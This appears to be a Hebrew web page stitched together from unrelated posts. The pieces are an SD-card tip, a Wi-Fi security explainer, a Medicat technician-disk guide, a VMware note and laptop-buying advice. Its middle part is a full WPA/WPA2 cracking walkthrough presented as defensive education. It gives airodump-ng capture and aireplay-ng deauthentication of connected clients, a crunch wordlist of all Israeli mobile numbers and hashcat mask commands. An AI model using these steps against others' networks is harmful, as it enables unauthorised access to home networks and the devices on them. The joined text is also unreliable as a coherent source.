תתחדשו! לפני שאתם מכניסים אותו בהתרגשות למכשיר שלכם, בדקו אותו!
(בוודאי אם נקנה בעליאקספרס וכד'). הבדיקה המהימנה הטובה ביותר היא באמצעות תוכנת H2testw (הקישור הוא לאתר הרשמי! אל תורידו מאתרים אחרים). שימו לב כי טובה לבדיקת נפח ותקינות הכרטיס ופחות לבדיקת מהירות.
היום כל עלם צעיר נחשף לעולם של אבטחת מידע, לרוב זה מגיע לנושא של אבטחת WIFI, מנסים לחשוף עוד ועוד סיסמאות של כל השכנים הקרובים, לרוב אנשים לא יצירתיים, והסיסמא שלהם זה מספר טלפון או פלאפון וכן הלאה.
כדאי לדעת, זה לא רק שפורצים לך לראוטר ומאיטים לך את הגלישה, אלא ברגע שיש גישה לראוטר אפשר לעשות נזקים חמורים לכל מה שמחובר אליו כולל מחשבים פלאפונים ומדפסות.
לכן חשבתי להסביר לכם איך העניין עובד (יחד עם המדריך של טל בן שושן) ועד כמה הסיסמא שלכם חזקה.
warning
המדריך נועד לשימוש האישי בלבד, כל מטרה אחרת היא על אחריות המשתמש בלבד!!!!
הסבר על Wi-Fi
Wi-Fi הוא קיצור של Wireless Fidelity, הוא התקן שידור של גלי רדיו ומבוסס על 802.11 מכשירים רבים מתחברים לאינטרנט ע"י Wi-Fi, מחשבים ניידים, מחשבים נייחים, קונסולות משחק, טלפונים סלולריים ועוד
במאמר זה אסביר על הצורות השונות של Wi-Fi, התקנים שונים בדגש על Router ביתי ו AP ארגוני או ביתי.
ראוטר ביתי מכיל כמה רכיבים, Modem,Wi-Fi,Swtich ואחראי על ההתחברות אל הספקית.
כעת נעבור על ההגדרות השונות הקיימות בראוטר ובWi-Fi עצמו.
קליטה: הקליטה של Wi-Fi נמדדת ב dBm, כלל ברזל, ככל שהdBm נמוך יותר, כך הקליטה טובה יותר
תמיד הקליטה תוצג כמינוס 20- ועד ל90-
20- ועד 30- : הקליטה מצויינת וכנראה אתם מרחק של מטר בודד מרכיב ה Wi-Fi במקרה שלנו AP או Router ביתי
50- : קליטה מצויינת גם, אך אתם במרחק של כמה מטרים מהנקודה
60- : קליטה סבירה, זאת אומרת שבעוצמה זו תוכלו לגלוש באינטרנט ולא להבחין באיטיות משמעותית
70- : אומר כי הקליטה פחות מסבירה ולא תוכלו לראות סרטונים באיכות גבוהה או לטעון דפים \ סרטונים במהירות סבירה
80- או 90-: עוצמת הקליטה נמוכה מאוד ולרוב לא תצליחו לגלוש באופן סביר ואם בכלל
טיפים נוספים: כאשר אתם קונים ראוטר או AP הבחינו כי לכל אנטנה יש עוצמת dbi ההבדל בין dbi ל dbm הוא ש dbi הוא כמה מקסימום של עוצמת השידור תיהיה ו dbm הוא כמה "כוח" משדר כעת האנטנה (Wi-Fi)
לכן, אם תבדקו למשל באתר של tp-link את הראוטר הבא:TL-WA901ND תוכלו להבחין כי רשום שהאנטנות למעשה הן 3 אנטנות שכל אחת 5dbi זאת אומרת, זה שיש לנו 3 אנטנות לא אומר שהעוצמה תיהיה גדולה יותר. Antenna Type 3*5dBi Detachable Omni Directional
לכן יש צורך לבדוק אם האנטנה של הראוטר היא יותר 5dbi וכך תוכלו להשיג קליטה חזקה יותר במכישרים מרוחקים יותר מהנקודה בה נמצא הראוטר.
כלי לבדיקת עוצמת השידור של Wi-Fi באזורכם הוא NetSpot, שניתן להוריד מגוגל.
SSID- הוא השם של "החיבור" אותו יפיץ הראוטר, למשל TalWifi חלקכם נכון להיום רגילים לראות HOTBOX וכו' של חברות הטלוויזיה והכבלים שכן הרבה בתים קונים "Bundle" טלוויזיה + ספק + תשתית וכל למעשה אותה החברה מספקת גם ראוטר והוא זה שמפיץ את ה Wi-Fi.
דוגמה לSSID המוצגים על ידי הטלפון הסלולרי, אותם SSID מצא הטלפון הסלולרי בכך שחיפש רשתות Wi-Fi ואלו הם היחידים שבתווך הקליטה שלו והוא מצא
סוגי הצפנות
כאשר אתם מגדירים את הראוטר, חובה להגדיר סיסמת התחברות ל SSID שכן, אם הרשת תיהיה פתוחה, כל תוקף יוכל להתחבר לרשת ולבצע התפקות מגוונות שכבר נלמדו פה באתר, החל מ MITM או שינוי DNS וכו'
לכן חובה עליכם להגדיר סיסמא חזקה, וסוג ההצפנה חייב להיות לפחות WPA2, כעת אסביר על סוגי ההצפנות הקיימות ברכיב ה Wi-Fi.
WEP – הוא קיצור של Wired Equivalnet Privacy והוא הפרוטוקול הישן ביותר והחלש ביותר מבין פרוטוקולי האבטחה של Wi-Fi, נכון להיום אין להשתמש בו שכן תוקף, בקלות יתרה (כפי לביצוע -על ידי מדריך באתר) לפרוץ את הרשת ולסכן את המשתמשים בה.
WPA – הוא קיצור של Wireless Protected Access והוא פותח את התאחדות ה Wi-Fi הפרוטוקול משתמש במפתח זמני מסוג TKIP והוא נחשב לפרוטוקול ביניים אשר מטרתו היא להחליף את פרוטוקול ה WEP
WPA2 – הוא התקן הסטנדרטי שיש להשתמש והוא הגרסה החדשה יותר של WPA, הוא משתמש במפתח זמני מסוג CCMP אך ההצפנה לרוב תיהיה AES WPA2 – Personal או בקיצור WPA2\PSK הוא השימוש הביתי של WPA2
WPA2\Enterprise- הוא השם השני של 802.1x והוא היכולת לבדוק את הרכיב המתחבר אליו על ידי כך שהרכיב שרוצה להתחבר יואשר על ידי שרת RADIUS
סטנדרטים ב Wi-Fi
לכל Wi-Fi יש סטנדרט שונה, ה802.11 מגיע בתצורה של B\G\N
B – הוא עד מהירות של 11Mbps ונחשב ליחסית איטי בתדר של 2.4Ghz
G – תומך עד קצב של 54Mbps בתדר של 2.4Ghz
N – תומך עד 300Mbps ויכול להגיע ל450Mbps בתדרים של 2.4Ghz ו 5Ghz
AC – הוא המהיר ביותר, קצב העברה של 1Gbps
תדרים
בעולם ה Wi-Fi קיימים 2 תדרים, 2.4Ghz ו 5Ghz ההנחה של אנשים היא ש5Ghz הוא גדול יותר ולכן מגיע רחוק יותר מ2.4Ghz אך זו טעות.
לתדר ה2.4Ghz יש 13 ערוצים, הערוצים המומלצים לבחירה הם: 1,6,11, הסיבה היא שערוצים אלו לא חופפים לגלי רדיו שקיימים ברכיבים אחרים ולכן עדיף לבחור בהם (לרוב הראוטר יבחר לבד את הערוץ ואין צורך להגדיר לו)
2.4Ghz הוא תדר נמוך יותר ולכן "חודר" קירות ומחסומים אחרים בקלות יותר מ5Ghz
אז למה שנבחר בתדר 2.4Ghz או ב5Ghz?
תדר ה5Ghz הוא תדר פחות עמוס, לכן הוא נחשב מהיר יותר ויכול לספק מהירות גבוהה יותר.
אבל! רוב הראוטרים תומכים ב Dual Band, זאת אומרת שיש לראוטר 4 אנטנות, 2 אנטנות בתדר 2.4Ghz ו 2 אנטנות בתדר 5Ghz, מדוע יש 2 אנטנות לכל תדר?
אחת משדרת ואחת קולטת וכך יוצרת פחות "עומס".
הגדרת סיסמא
ניתן להבחין כי בחרתי ב WPA\WPA2 PSK שכן כמו שהסברתי למעלה, זה הבחירה הכי טובה להגן על הרשת, עדיף לא להגדיר סיסמאות כמו טלפון סלולרי או מספר בית, גם תעודת זהות לא כדאי
הסיסמא הטובה ביותר היא ארוכה ומורכבת ממספרים ואותיות וכך להקשות על תוקף "לפרוץ" את הסיסמא ולהיכנס לרשת שלנו.
כעת נסביר איך תוקפים רשת אלחוטית כדי לדעת איך להימנע ממנה.
WPA\WPA2 הם פרוטוקולי אבטחה של 802.11 והם משתמשים בהצפנה מסוג CCMP וAES הם למעשה היורשים של WEP.
PSK הוא קיצור של Pre-Shared Key מצב בו יש מפתח אחד בו המשתמש מקיש את המפתח ואם המפתח תואם למפתח הקיים בWi-Fi הוא יקבל גישה.
כאשר טלפון סלולרי רוצה גישה לראוטר הוא יתחיל בתהליך הנקרא Association בו הוא מקבל את הקוד (הPSK) ובודק אם הקוד זהה לקוד הקיים אצלו, אם כן ההתחברות תצליח.
פעולה זו נקראת לחיצת היד המרובעת Four-Way Handshake, במצב זה לשני הצדדים יש מפתח זהה (קוד זהה) הAP (הראוטר) שולח לטלפון הסלולרי מספר אקראי כלשהו, אשר נקרא A-Nonce הודעה שאינה מוצפנת ואז הטלפון הסלולרי יוצר מפתח חדש על ידי ה PMK קיצור של Pairwise-Master-Key שמייצר PTK קיצור של Pairwise-Transient-Key
וכל זאת על מנת שכל צד רוצה להראות שהקוד ברשותו הוא הנכון, על מנת להבין זאת יותר טוב אסביר את זה כך:
הראוטר שולח לטלפון הסלולרי ANonce שהוא מפתח זמני והוא מתרחש בהתחברות הראשונה של הטלפון הסלולרי אל ה AP (הראוטר)
כעת הטלפון הסלולרי בונה SNonce ושולח אותו עם ה PTK (גם Message Intergrity Code) נשלח גם אל ה AP
כעת ה AP יוצר GTK קיצור של Group-Temporal-Key רצף של מספרים שבה לזהות התקפה של Replay ובסופו הטלפון הסלולרי (הלקוח)
שולח ACK על מנת לאשר סופית שזה הקוד הPSK שאיתו הוא יתחבר אל ה AP
מדוע זה נקרא Four Way Handshake, בגלל ארבעת הנקודות שהצגתי למעלה, כך למעשה מוודא הראוטר (AP) שאכן הלקוח (הטלפון הסלולרי) יודע את הקוד ומאשר אותו
על מנת לתקוף רשת המוגנת באמצעות WPA\WPA2 PSK נצטרך שהרכיבים יבצעו את ה Four Way Handshake, ללא ביצוע של התהליך לא נוכל לקבל את ה IV's שאנו רוצים ולא נצליח לבצע התקפת Brute Force על הAP
על מנת להשתמש במדריך זה, נצטרך להשתמש ברכיב Wi-Fi שמסוגל לבצע Packet-Injection ולהיכנס למצב Monitor Mode (מצב בו נאסוף את ה Packets שאנו צריכים על מנת "לפרוץ".
אז נצטרך את הדברים הבאים:
Wi-Fi Adapter – ALFA AWUS036ACH (ניתן להשתמש ברכיב אחר אשר תומך ב Kali)
לצורך מעבדה זו הקמתי SSID בשם Bed_Shushan, ראוטר הנמצא בחדר השינה ועליו אציג את המאמר.
הכלי בו נשתמש נקרא airodump-ng, נתחיל בסריקת הרשתות הנמצאות באזור
נבדוק מה שם ה כרטיס Wifi שלנו
sudo iwconfig
נקיש
sudo airmon-ng check kill
תחילה נגדיר את הראוטר במצב Monitor Mode
sudo sudo iwconfig wlan0 mode monitor
ואז הגדירו אותו
sudo airmon-ng start wlan0
נקיש את הפקודה שסורקת את הרשתות
sudo airodump-ng wlan0
כעת נשתמש באותו הכלי על מנת לאסוף את ה IV's שהם ה- Data שאנו צריכים, נקיש את כתובת הMAC של הראוטר וניתן שם לקובץ ה cap שיווצר מאוחר יותר (קובץ זה מכיל את כל התעבורה של הרשת אותה אנו מקליטים)
כעת הסריקה תתחיל, חשוב! אין לסגור חלון זה בשום שלב, רק לאחר שהשגנו את הWPA Handshake שהוא ה Four Way Handshake (ארשום לכם מתי אפשר לסגור חלון זה)
על מנת לקבל את הWPA Handshake עלינו לחכות שלקוח (מחשב נייד, טלפון סלולרי) יבצע אימות מחדש מול הAP (הראוטר) , היינו מחכים אבל יש דרך אחרת והיא בשימוש של כלי בשם aireplay-ng על ידי כלי זה אנו נשלח לראוטר 4 Packets שבה אנו מודיעים על התנתקות ממנו, פעולה זו תכריח את המשתמש המחובר לרשת להתנתק מהAP ולאחר מכן להתחבר מחדש (מכיוון שכך המכשיר המחובר לWi-Fi שומר על התחברות)
נקיש את הפקודה, בMAC הראשון (משמאל לימין) נקיש את הAP הלא הוא הראוטר וב- MAC השני את המכשיר שעכשיו מחובר אליו.
נקבל את הפלט הבא, נמתין שיסתיים, ברגע זה הלקוח יתנתק ויתחבר מחדש (הלקוח לא ירגיש ניתוק אלא אם הוא צופה בסרטון או כל דבר באותו הרגע)
כעת נוכל להבחין, שהתווסף לנו שורה בחלון של הסריקה של Data (מסומן באדום)
ברגע זה, נוכל להפעיל Brute Force על Key שהשגנו, אך לפני זה נאלץ ליצור קובץ סיסמאות, למה שניצור אותו ולא נוריד מהאינטרנט? סיבה פשוטה, רוב הישראלים משתמשים במספרי טלפון או תעודת זהות על מנת להגדיר את הסיסמא ל Wi-Fi ואנו ננצל בדיוק את זה
הכירו את Crunch
ישנם מלא כלים של יצירת סיסמאות, המפורסמת ביותר היא Crunch, הוא כלי ליצירת קבצי סיסמאות, על פי תבנית, בגלל שטלפון סלולרי ישראלי מתחיל ב05 נוכל להשתמש בזה על מנת ליצור קובץ סיסמאות יחסית קטן
נקיש את הפקודה
sudo crunch 10 10 -t 05%%%%%%%% -o wordnum1.txt
הפקודה אומרת שכמות התווים היא 10 וההתחלה של כל סיסמא היא 05 ואחריה ברצף עולה 8 מספרים, שכן מספר טלפון סלולרי ישראלי הוא 10 תווים כך שיתקבל 0500000001 ואז 0500000002 וכן הלאה עד 0599999999 וכך לא נפספס מספר טלפון סלולרי אחד.
כך מסמך הסיסמאות נראה:
כעת נבצע את ה Brute Force על IV שהוצאנו, נקיש את הפקודה
shushan_bed_wpa-01.cap הוא הקובץ שנוצר כאשר הרצנו את airodump-ng וקובץ זה נמצא בתיקיית ה Home שלנו
wordnum1.txt הוא קובץ הסיסמאות שלנו שיצרנו קודם.
כעת התהליך ירוץ
בסיום לאחר זמן של סריקה ואם הסיסמא היא טלפון סלולרי נקבל את הסיסמא!
חשוב לדעת שהכלי aircrack הוא כלי ישן ואיטי מאוד, היום יש כלים שעובדים בווינדוס שמשתמשים בכרטיס גרפי שיכולים להריץ מיליארדי סיסמאות בשעה או פחות (תלוי לפי סוג המעבד והכרטיס גרפי שלך.
הורדתי את הכלי, והפעלתי אותו כך ע"י הפעלת שורת הפקודה בשורת הכתובת:
אחרי זה נפתח חלון של שורת הפקודה, ומקישים hashcat -h בשורת הפקודה כדי לקבל הסבר על התוכנה.
התוכנה מסוגלת להרבה דברים ואני לא רוצה להאריך אלא רק להתמקד באבטחת WIFI.
שימו לב, כדי לפצח סיסמת רשת אלחוטית, ישנם 2 אפשריות:
דרך Handshake
דרך PMKID
דרך Handshake:
(הוסבר לעיל איך משיגים את הקובץ)
לוקחים את הקובץ CAB. וממירים אותו לקובץ hccapx ע"י התוכנה cap2hccapx, יש אפשרות להמיר באתר כאן
ואז מקישים לפי הבחירה שלך:
ועכשיו אפרט מה כל פקודה:
a- פירושו האם לפרוץ דרך wordlist (רשימת סיסמאות מוכנה) או דרך brute-force (התקפה לפי סדר אותיות או מספרים, יותר לאט לפי אורך הסיסמא)
m- פירושו מה מטרת הפריצה, ישנם המון מטרות, אבל לעניינו המטרה היא m- 2500
w - פירושו כמה כח להפעיל בהרצת הפיצוח, הנורמלי זה דרגה 3, ואם אתם רוצים שהמחשב שלכם פחות יתאמץ, אז תבחרו 2 או 1 (דורש יותר זמן בפיצוח)
ואז מכניסים את הקובץ שאנו צריכים לפרוץ (hccapx.), ומכניסים את הקובץ של רשימת הסיסמאות (txt.) (lst.) כמו זה למשל:
hashcat -a 0 -m 2500 C:\Users\כללי\Downloads\wpa\backup\1234-01.cap.hccapx C:\Users\כללי\Downloads\wpa\rockyou.txt
יש באמתחתי כמה קבצים שמכילים רשימת סיסמאות נפוצות, אולי בהזדמנות אני אעלה כמה
אפשר להוריד מהאתר הזה מלא סיסמאות שמגיעים לגודל של עשרות גי'גה.
להלן הפקודה שעשיתי על רשת שלי עם קובץ סיסמאות שמכיל 1 מיליארד ו 212 מיליון סיסמאות תוך 3 שעות ו 10 דקות:
דרך PMKID:
בשביל לתפוס את ה - PMKID ישנם כמה תוכנות שעושות את זה, ניתן לקרוא כאןוכאן
ואז בפקודה של התוכנה hashcat להכניס את הפקודה 16800 m - שזה התקפה דרך PMKID במקום 2500 m -
ישנה אפשרות להריץ סיסמאות לפי בחירה אישית שלך ללא שימוש בקובץ של רשימת סיסמאות, למשל אם אני רוצה שהתוכנה תריץ לי רק מספרים או אותיות קטנות באנגלית או גדולות לבד או גם וגם וגם, אפשר להשתמש בדוגמאות כדלהלן:
למשל, אם אני רוצה להשתמש רק במספרים בלבד באורך 8 תווים, אז אני כותב את הפקודה כך:
hashcat -a 3 -m 2500 C:\Users\כללי\Downloads\wpa\backup\1234-01.cap.hccapx ?d?d?d?d?d?d?d?d
שימו לב, המחשב שלי מריץ תוך 9 דקות!!!! את הפקודה הזאת, זה מראה כמה חשוב לבחור סיסמא קשה המורכבת ממספרים ואותיות קטנות וגדולות.
ואם אני רוצה להשתמש רק באותיות קטנות בלבד באורך 8 תווים, אז אני כותב את הפקודה כך:
hashcat -a 3 -m 2500 C:\Users\כללי\Downloads\wpa\backup\1234-01.cap.hccapx ?l?l?l?l?l?l?l?l
ואם למשל אני יודע שהסיסמא מתחילה במספרים של 077 ושאר המספרים אני לא יודע, אז אני כותב כך:
hashcat -a 3 -m 2500 C:\Users\כללי\Downloads\wpa\backup\1234-01.cap.hccapx 077?d?d?d?d?d?d?d
וכן הלאה על זה הדרך.
סיכום ביניים
אמנם רובם משתמשים בקאלי בשביל דברים מהסוג הזה, אבל אם רוצים להתמקד באבטחת סיסמאות WIFI בלבד, הכלי הבא מכיל את כל הכלים הנדרשים ואף מעבר לזה כדי לבדוק עד כמה הראוטר שלך חזק ולא נפרץ בקלות.
החלטתי לעשות מדריך מקיף על הנושא של דיסק הטכנאים הגדול והמתקדם בעולם Medicat.
אני יודע שכולם מכירים את הדיסק של הרוסי הגאון Sergei Strelec's וכולם ממליצים עליו, ובאמת אין צורך ביותר מזה ואפילו גם זה די והותר.
אבל חשבתי לעצמי להסביר הדרכה איך להשתמש בדיסק של Medicat כולל הסבר בעברית עם תמונות + הסרטה וגם להרחיב במעלות שקיימות בדיסק הנפלא הזה.
אני חושב באופן אישי אחרי שמתרגלים לדיסק הזה, אתה לא רוצה לשמוע על שום דיסק אחר כי הוא כולל את כל המעלות שיכולות להיות כפי שאסביר בהמשך.
בקיצור, אם אתם אוהבים ללכת עד לקצה ואתם אוהבים שיש לכם הכל כולל הכל בצורה מושלמת, כדאי לכם לעבור על המדריך הנוכחי, ולהתרשם לטובה מהדיסק הזה.
ראשית כל, לפני שניגשים להתעסק עם הדיסק הזה אני מאוד ממליץ על התקן נשלף בעל נפח של 128 גי'גה בעל מהירות USB 3.0 , כי במדריך הזה אני הולך להסביר לכם איך אתם מכניסים את כל מה שאתם אוהבים במקום אחד נקי ומסודר עם ממשק יפה ונוח מאוד למראה.
יש הרבה מה לדבר על המעלות שיש לדיסק הזה אבל אני אשתדל לקצר ולתמצת את הכל.
כל דיסק טכנאים ולא משנה איזה, לא מכיל את הכמות המטורפת של התוכנות שמכיל הדיסק הזה, המתחרה הגדול שלו זה ללא ספק הדיסק של
Sergei Strelec's , שבאמת עשה עבודה יפה ויש בפנים את כל מה שצריך, אבל עדיין אפשר לומר ש - Medicat נותן מלחמה לא רעה בכלל ועוקף אותו בהמון פרמטרים.
כל דיסק טכנאים אחר אין גישה לתוכנות שנמצאים בתוכו, לעומת זאת, הדיסק Medicat מכיל עשרות תוכנות ניידות שאפשר לפתוח אותם בכל מקום גם בלי להריץ את הדיסק מהביוס, זה יתרון ענק ובהחלט שיפור משמעותי שמשאיר אבק לכולם.
תחשבו על זה, אם אני רוצה איזה תוכנה ולא משנה באיזה קטגוריה היא, אני שולף אותה מההתקן נשלף ללא צורך להתקין אותה על המחשב ועושה בקלות ובמהירות את מה שאני צריך לעשות.
איך מגיעים אליה?!
נורא פשוט, לוחצים על התוכנה Start שנמצאת בשורש ההתקן:
שימו לב, התוכנה תמיד רצה ברקע ואפשר לפתוח אותה בכל זמן דרך הקיצור הבא בצד שמאל למטה:
בכל דיסק טכנאים אם אני רוצה להיכנס לדיסקים אחרים של בוטים אני חייב להריץ את המערכת הפעלה שלו, לעומת זאת ב - Medicat יש אפשרות לבחור מהתפריט את הנושא הרצוי ללא צורך להפעיל את המערכת הפעלה.
לדוגמא, אם אני רוצה דיסק בוט שקשור למחיצות או דיסק בוט שקשור לאיפוס סיסמא, אני לא צריך להעלות את המערכת הפעלה של הדיסק טכנאים אלא בתפריט אני יכול לבחור שיעלה דיסק בוט של Acronis למשל, אני פשוט בוחר בתפריט את הקטגוריה של Backup and Restore:
וכן על זה הדרך.
ישנם הרבה כלים שעוסקים בנושא של איפוס סיסמא במערכת הפעלה, אבל הכלי של Jayro Jones הוא הכלי המושלם המכיל בתוכו את כל התוכנות העוסקות בנושא הזה, ואין אתר או פורום שלא מזכיר את הכלי הזה, פשוט עבודה מושלמת:
לא סתם אני קורא לדיסק הזה מלך הדיסקים של כל הטכנאים, כי אתה יכול להכניס בפנים כל דיסק טכנאים שתחפוץ.
למשל, אם אני רוצה שיהיה לי בנוסף על זה גם דיסק טכנאים של Sergei Strelec's , אני פשוט מכניס את הקובץ ISO לתיקייה הנכונה בתפריט ואז אני יכול להעלות אותו בקלות.
לוקחים את הקובץ ISO של Sergei ומעתיקים אותו לתיקייה Boot_an_Operating_System :
ואז נוכל לראות בתפריט את הדיסק טכנאים שהוספנו כאן:
וכן על זה הדרך.
כמובן שיש אפשרות להוסיף כל התקנת מערכת הפעלה שרוצים ללא צורך בצריבה מיוחדת.
פשוט מכניסים את הקובץ ISO של המערכת הפעלה לתיקיית OSimages :
ואז נוכל לראות בתפריט את המערכת הפעלה שהוספנו כאן:
ועוד הרבה הרבה דברים טובים ומועילים שאחרי שמתרגלים אליהם, קשה להסתגל למשהו אחר.
שימו לב, יש 2 אפשרויות איך להשתמש ב - Medicat VHD.
על התקן נשלף מפורמט דרך וונטוי.
על התקן נשלף של MediCat USB מוכן.
על התקן נשלף מפורמט דרך וונטוי:
ראשית כל, מפרמטים את ההתקן נשלף דרך וונטוי כמו שהוסבר בהרחבה למעלה, ועושים אתחול להתקן נשלף למערכת קבצים NTFS כמו שהוסבר.
כעת, מעתיקים את הקובץ [UEFI]MediCat_VHD&DW שנמצא בארכיון MediCat_VHD לתוך ההתקן נשלף:
לכן כדי שזה יעבוד צריך להוריד את הקובץ הזה ולהכניס אותו בהתקן ואז תראה את הקובץ כפי שרואים בתמונה הבאה:
אם עדיין לא מובן פשוט להוריד את הקובץ הבא ותחלץ אותו להתקן נשלף שלך, ואז יהיה לך סה"כ 2 קבצים בהתקן.
אחד תיקייה ventoy שיש בה את הקובץ ventoy_vhdboot.img ואחד קובץ VHD
פשוט תחלץ את הקובץ [UEFI]MediCat_VHD&DW שנמצא בארכיון MediCat_VHD לתוך תיקיית VHD שנמצאת בשורש ההתקן נשלף המוכן של MEDICAT USB:
וזהו, אפשר לראות את זה מופיע בתפריט בקטגוריה של VHD :
שאלות ותשובות
ד
האם הכרחי להתקין את זה בדיסק gpt?
ראיתי את השאלה הזאת בפורום שלו והוא ענה להם כך:
I went forward and set GPT as the default now, as more and more computers are going UEFI only. But if MBR works better for you, by all means, use what works.
תרגום:
הלכתי קדימה והגדרתי את GPT כברירת המחדל כעת, מכיוון שיותר ויותר מחשבים עוברים UEFI בלבד. אבל אם MBR עובד טוב יותר עבורך, בכל אופן, השתמש במה שעובד.
אני מתייחס לקובץ כאל קובץ בעל סיומת iso? לדוגמא rufus יצרוב אותו?
לא, זה לא קובץ ISO ואין דרך לצרוב אותו מלבד הדרך שהוזכרה במדריך, כי יוצר הדיסק הכין תיקייה עם על האייקונים והרקעים שמיוחדים לתוכנת וונטוי.
בעצם ה vhd זה מערכת 11 וחוץ מזה יש את הדיסק טכנאים עם התפריט הרגיל של medi cat שזה קובץ נפרד?!
כן.
אבל גם VHD זה דיסק טכנאים רק בלי תפריט אבל כפי שאמרת אפשר לחבר את שתיהם.
יש יתרון להחזיק את שניהם ?
אין כל כך יתרון, זאת אומרת שאפשר להשתמש ב - Medicat VHD ללא צורך ב - MEDICAT USB ואז זה נכנס לך ישר למערכת הפעלה 11 עם כל התוכנות ניידות בפנים.
פשוט יוצר הדיסק עשה את זה למי שלא רוצה למחוק את ה - MEDICAT USB שכבר מוכן לו אז יש אפשרות להוסיף את זה בהתקן כפי שהוסבר לעיל , אבל כאמור אין צורך בשתיהם.
אמנם זה לא חידוש גדול המדריך שאכתוב כאן, אבל חשבתי בכל זאת להעלות את המדריך על הכתב בגלל פניות של משתמשים שזקוקים לידע הזה וכן השתדלתי להוסיף דברים אחרים שאולי אחרים לא יודעים.
פתחתי אשכול של אוסף של דיסק טכנאים ודברים נלווים, ולא תמיד יש כח ועצבים לאתחל את המחשב מחדש ולהיכנס ל - Boot Menu ולהעלות את הדיסקים הנ"ל, לכן יש את הפתרון המהיר של מכונה וירטואלית, אמנם בווינדוס 10 (פרו) כבר יש מובנה "ארגז חול" אבל עדיין עדיף תוכנה של צד שלישי מאשר "ארגז חול" של ווינדוס מכמה וכמה סיבות (כמו זה למשל :
היתרון של התוכנה הזאת על הארגז חול
שאפשר לשמור בה דברים
גם אם אתה מחפש מערכת הפעלה לשפן נסיונות, אז יש צורך בדברים בסיסים שיהיו מותקנים
כמו למשל אם יש לך סינון, אז תעודת אבטחה, תוכנת חילוץ, ועוד..
אז בארגז חול כל פעם הכל מתפאס לגמרי וחוזר ל0, ובמכונה אפשר להתקין ולשמור את הדברים)
אז בשביל להריץ ISO, ראשית יש להוריד את המכונה וירטואלית (כל אחד מה שהוא אוהב) המדריך יעסוק כרגע בתוכנת VMware
VMware Workstation 16 Pro 16.2.3.19376536
VMware Workstation Pro הוא תקן התעשייה להפעלת מספר מערכות הפעלה כמכונות וירטואליות (VM) במחשב לינוקס או Windows. אנשי מקצוע בתחום IT, מפתחים ועסקים שבונים, בודקים או מדגימים תוכנות לכל מכשיר, פלטפורמה או ענן, מסתמכים על Workstation Pro.
Workstation Pro מספק פיתרון וירטואליזציה בשולחן העבודה המיועד לכל סוג משתמש.
זה התחיל מחיפוש אחר מחשב טוב עבורי. בזמנו האופציה של להזמין ישירות מאמזון לארץ לא הייתה זמינה, המחירים בארץ היו משוגעים וחיפשתי דרך להשיג מחשב נייד מעולה שיחזיק לי כל התואר. נסיעת עבודה של מישהו מהמשפחה אפשר לנצל הזדמנות על מפרט מעולה מארה"ב בפער ענק במחיר מול הארץ. כך היה לי מחשב טוב יותר, יפה יותר וחזק יותר, בהרבה פחות, ממאות הסטודנטים לצידי. מפה לשם וכבר עשרות לפטופים רכשתי בשנים האחרונות. לא כולם עבורי כמובן, אלא לבני המשפחה, החברים ומקום העבודה. לא מעט גם פירקתי, שדרגתי ותיקנתי ולא מעט לקחים נלמדו בדרך. את הלקחים האלו – אני רוצה להעביר אליכם וכמובן – לתת כמה המלצות.
המחיר!
לכולנו יש נטייה להיתפס למספר עגול מסויים. במחשבים נראה שהמספרים הטיפולוגים שכולם אוהבים הם 1000, 2000 ו2500. אתם מחפשים איזו נוסחא שלא בהכרח קיימת. מוצר שיתאים לכם לכל הדרישות ויענה בדיוק לתקציב התיאורטי שקבעתם, עוד לפני שבדקת מה המחירים ומה אכן מתאים לכם.
אז כמובן שאפשר למצוא מחשב כמעט בכל תקציב, אך קביעת תקציב קשיח ושרירותי – היא דווקא בחירה כלכלית גרועה!
כן, להבדיל מטיפים צרכניים של מאמנים וכתבות ברשת הממליצים לכם להיצמד למספר מסויים, במחשבים – ההשקעה משתלמת!
אם בסמרטפונים נכון יותר לקנות מכשירי דגל וביניים משתלמים מאשר לקנות מכשיר דגל במחיר של משכורת שלמה, כי מידי שנה יש קפיצת דור משמעותית ביכולות, הביצועים והמצלמה, כמו גם בלאי של הסוללה (המובנית) והעובדה שבכל רגע נתון, המכשיר יכול פשוט להחליק לנו מהיד ולהישבר/להיגנב/להתקלקל או ללכת לאיבוד, לא כך עם מחשבים ניידים, שיושבים בבטחה בתיק או על השולחן ומשמשים בממוצע – הרבה יותר משנתיים.
טוב לבחור במחשב מעט חזק ואיכותי יותר מאשר להתפשר על מחשב 'מספיק' וזול כרגע, רק בכדי לעמוד בתקציב הדמיוני שקבענו מראש.
זה ישפיע לטובה לא רק על חווית השימוש שלכם – כלומר מחשב מהיר יותר (חוסך זמן), איכותי יותר, מסך טוב יותר, משקל נמוך יותר וכו' וכו', אלא גם אומר שסביר להניח, שהמחשב יהיה טוב יותר ומהנה לשימוש גם שנה ושנתיים יותר!
לכן הבחירה הכלכלית הנכונה בקניית מחשב ובפרט מחשב נייד – היא לא לקנות מחשבים זולים מידי ש'עושים את העבודה' היום, אלא להשקיע קצת יותר, להנות ממחשב טוב יותר כבר היום – ולשדרג פחות! הבדל של כמה מאות ש"ח היום, יכול לתת לכם עוד כמה שנים טובות עם מחשב מהיר ויעיל.
כמובן שכלל זה לא תקף על כל רמות המחירים – ויש נקודה שממנה התמורה לשקל שלכם – זניחה. טווח המחיר האידאלי היום הוא בין 2500 ל4000 ש"ח, כאשר 'Sweet Spot', יושב בנוחות סביב ה3000 ש"ח, תמורתם תמצאו מחשבים מעולים שיענו לכם על כמעט כל צורך, גם מספר שנים קדימה.
המותג! חשוב אבל...
רבים חושבים שכדאי לקנות רק DELL. או לנובו. או בעצם אפל. הם טועים.
כמו בשאר תחומי הצרכנות, יש סטריאוטיפים ותפיסות שגויות רבות בתחום הלפטופים, אפילו יותר מתחומים אחרים.
בעוד אם אתם קונים סלולרי כגון סמסונג, אייפון או שיאומי, אתם יודעים פחות או יותר למה לצפות – לא כך במחשבים. כמו המקררים, מכונות הכביסה ואפילו המכוניות שלנו, היום המחשבים לא מיוצרים במקום אחד ובאיכות אחידה. אותו המותג, מוצלח ואמין ככל שהיה בעבר, ואף בדגם נוכחי, יכול לייצר דגם אחד בסין, אחר בתאילנד ואחר בויטנאם ועוד לא דיברנו על הרכיבים הפנימיים, שאיכותם יכולה להשתנות מקצה לקצה.
